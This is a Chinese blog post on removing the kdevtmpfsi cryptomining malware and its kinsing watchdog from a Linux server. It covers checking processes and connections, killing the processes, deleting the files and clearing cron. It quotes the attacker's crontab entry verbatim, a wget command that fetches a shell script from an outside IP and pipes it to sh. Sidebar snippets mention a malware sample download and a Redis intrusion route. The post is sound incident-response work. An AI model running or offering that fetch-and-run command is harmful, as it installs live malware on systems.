kdevtmpfsi挖矿病毒以及他的守护进程kinsing 已完美解决 亲测

最新推荐文章于 2024-05-28 17:38:59 发布
最新推荐文章于 2024-05-28 17:38:59 发布
阅读量4.2k 收藏 7
点赞数 5
分类专栏: ubuntu linux 文章标签: 挖矿
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fashion138/article/details/103762004
版权

服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。

处理步骤如下:

kdevtmpfsi 进程处理:

1、# top

     查看cpu占用情况,找到占用cpu的进程     最后是  kdevtmpfsi

2、# netstat -natp 

     根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了

此时,挖矿脚本大概率定时在你的crontab里面。

crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

有兴趣可以研究这个sh脚本  http://195.3.146.118/unk.sh

3、解决方法

kdevtmpfsi有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。

#查询关联的守护进程
[root@iZwz97v9b9ili0mz7rl188Z overlay2]# systemctl status 2854
● session-5649.scope - Session 5649 of user root
   Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled)
  Drop-In: /run/systemd/system/session-5649.scope.d
           └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
   Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago
   CGroup: /user.slice/user-0.slice/session-5649.scope
           ├─ 2854 /tmp/kdevtmpfsi
           └─18534 ./kinsing1oZIY4Aid7

 具体命令:

systemctl status 23437

ps -aux | grep kinsing

ps -aux | grep kdevtmpfsi

kill  -9   23437

kill  -9   18534

cd  /tmp

ls

 rm -rf kdevtmpfsi 

rm -rf /var/tmp/kinsing  记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令

find / -name kdevtmpfsi

find / -name kinsing

进入/var/spool/cron  查看是否有相关的木马定时任务在执行  有的话删掉再重启下crontab

 


 

小白菜被猪给拱了
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
kdevtmpfsi挖矿病毒,反复启动,守护进程kinsing害人不浅,一次彻底删除
m0_37587869的博客
01-04 3122
最近照例巡检服务器情况,当看到cup 直接飙到100%,像脉搏监视器检测到人没有心跳了一样,全是直线,吓我一身冷汗,预感大事不妙!继续查看发现是一周前19点左右开始的,这就很奇怪,cpu 跑100%,商城竟然没有挂掉(虽然是地方小商城,但用户量也有10万加,要是挂了后果不堪设想),真是不幸中的万幸。发现是中了木马,有人在服务器上挖矿kdevtmpfsi。然后百度了一圈,下面综合各位大神的办法,最终解决,总结一下 1.首先,top 了下系统进程 2.接着输入命令 systemctl status 12625
Linux应急响应-挖矿kdevtmpfsi)——事件复现(含样本)
W小哥
03-16 4629
此次复现挖矿清除不溯源,只是简单的记一下 一、事件背景 某天打开我的服务器,发现CPU飙到100%。肯定有问题,应该又被挖矿了 服务器:Linux系统 二、事件处理 2.1 top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了 kill -9 但是过了一会儿又自动启动了 查看定时任务:crontab -l 删除定时任务:crontab -r 删除相关文件: find /
高效秒解 服务器被注入挖矿代码
最新发布
05-28 704
秒解 服务器被注入 挖矿程序
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
张火火博客
05-31 1808
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
处理处理kdevtmpfsi挖矿病毒以及他的守护进程kinsing
Owen_goodman的博客
12-27 8348
服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。 处理步骤如下: kdevtmpfsi 进程处理: 1、# top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外i...
超级详细了解进程和病毒知识
hzbairly的专栏
10-12 842
 第一:进程是什么  进程为应用程序的运行实例,是应用程序的一次动态执行。看似高深,我们可以简单地理解为:它是操作系统当前运行的执行程序。在系统当前运行的执行程序里包括:系统管理计算机个体和完成各种操作所必需的程序;用户开启、执行的额外程序,当然也包括用户不知道,而自动运行的非法程序(它们就有可能是病毒程序)。   危害较大的可执行病毒同样以“进程”形式出现在系统内部(一些病毒可能并不被进程列表显
Linux——kdevtmpfsi挖矿)进程解决方法与解决过程
Hern(宋兆恒)
03-23 9740
问题 CPU堵塞(100%)。我这里的主进程是YDService,你的可能和我的不一致。 原因 服务器密码被别人知道 防火墙设置问题 …… 解决方法 1、查看进程,记录下占用CPU的进程PID(包括挖矿主进程PID)命令: top 或 ps aux | less 2、查看异常链接(有助于发现问题缘由),命令: netstat -natp 或 netstat -n...
守护进程
akiqiu的博客
06-29 265
守护进程也称精灵进程(Daemon),是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。 守护进程的特点有:(1)自成一个会话,即会话id是守护进程的pid,SID==PID                                   (2)自成一个进程组,即组长id是守护进程的pid    
linux服务器被挂码--kdevtmpfsikinsing,笨办法解决
zhoufenguang的博客
08-13 979
服务器cpu突然被占满,进程中包含kdevtmpfsi,或者kinsing,那么应该是被挂码了,网传是一种挖矿病毒;试过网上几种办法都没有彻底杀掉,只好使用一个笨办法了; killking.sh #!/bin/bash function kmpro() { pids=$(ps aux | grep -w $1 | grep -v grep | awk '{print $2}') for pid in $pids do kill 9 $pid >/dev/
kdevtmpfsi样本.zip
03-16
在这里,我将详细解释`kdevtmpfsi`的相关知识点,包括其性质、工作原理、危害以及防范措施。 1. **什么是kdevtmpfsi?** `kdevtmpfsi`是一种针对Linux操作系统的后门程序,它通常通过网络攻击或利用系统漏洞植入...
云服务器异常测试kdevtmpfsi.rar
12-31
云服务器和kdevtmpfsi测试版和处理方法 CPU 会大于100%
进程守护
CP9的专栏
04-21 1669
进程守护  进程守护是指防止进程被结束掉,用一些编程技术把它保护起来,一般是病毒采用的技术手段,它们hook一些api,或者注入其它进程空间,比较多的是注入explorer.exe,这些技术应该属于单进程守护,因为我的程序中还不会用到,所以也没有研究。本文只是讲解些一般的双进程守护,可以达到进程守护的目的,在任务管理器中也可以看到相关的进程。所谓的双进程守护,就是两个程序有部分相同
【Redis之轨迹】记录一次 Linux 服务器惨遭挖矿的经历 [kdevtmpfs](Redis 安全问题)
Ice__Clean的博客
09-30 392
Redis 漏洞说明 Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利用防火墙进行屏蔽的情况下,将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,将导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 攻击者在未授权访问 Redis 的情况下利用 Redis 的相关方法,可以成功将自己的公钥写入目标服务器的 ~/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接登录目标服务器。如果Redis服务是以roo.
【动态规划】木马级守护进程
wu_yihao的专栏
02-05 566
木马级守护进程木马级守护进程   【问题描述】       “哈哈哈,大功告成,木马级守护进程,欢迎来破。”欧教如是说。      欧教自从使用了新的教师端守护进程之后,要发现在机房偷偷玩游戏的同学简直是易如  反掌。对于欧教而言,要使打游戏的同学改邪归正的最好办法就是在他打游戏的时候通过教  师端关掉他的电脑。      但是由于欧教的关机程序写的不好,因此如果要关机,就必须
记Linux服务器中的 kdevtmpfsi 挖矿病毒
weixin_51349952的博客
07-03 528
2021.7.2日(周五)邻近下班,突然旁边的小美同事急促的告知我网站后台上不去了,然后就上服务器上去看,一看发现内存占用变成90%左右,当时一惊,那就加个班吧~ 使用top命令查看后,发现有个进程占了很大资源,这个进程就是kdevtmpfs,Google 一下才知道,好家伙,服务器被当成矿机了 top 这个进程以及相关进程,都是运行在 www 用户下,并且会加上一个定时任务 直接 kill 并不能将其结束掉,它还有守护进程及可能存在的定时任务。 1. 查看定时任务 crontab
拥有进程守护的恶意程序查杀
qq_35474564的博客
09-21 316
病毒有进程守护程序时,往往刚把一个程序结束后,被结束的程序立马就会被重启,所以可以先把需要结束的程序先挂起,然后在一起结束。 注意权限问题,权限不够可能无法结束进程。 #include <Windows.h> #include <stdio.h> #include <TlHelp32.h> int main() { HANDLE hProcessSnap; // 进程快照句柄 HANDLE hProcess; /
清除守护进程程序
aod83029的博客
05-05 322
#include "windows.h" #include "stdio.h" #include "tlhelp32.h" int main() { ///////////////////////////////////////////////////////////////////// // 程序首先要暂停病毒进程 ////////////////////////...
linux下“kdevtmpfsi“与“kinsing“进程导致系统卡顿
全栈开发者的博客
11-23 1259
系统卡顿,top下发下cpu异常 kdevtmpfsi是一种挖矿病毒,而且有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。 1.杀掉进程并删除文件(杀掉之后还会重新启动) ps -aux | grep kinsing kill -9 15881 ps -aux | grep kdevtmpfsi kill -9 15881 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kins.
阿里云服务器中挖矿病毒了,名称为 kinsing
qq_40215763的博客
05-06 4239
五一本来就没有过好,上班来了第一天同事就说页面打不开了 不开心的我就打开看看项目页面,不看不要紧一看还真是见鬼了 赶紧查看一下 top查看了一下 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 25638 root 10 -10 25518 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值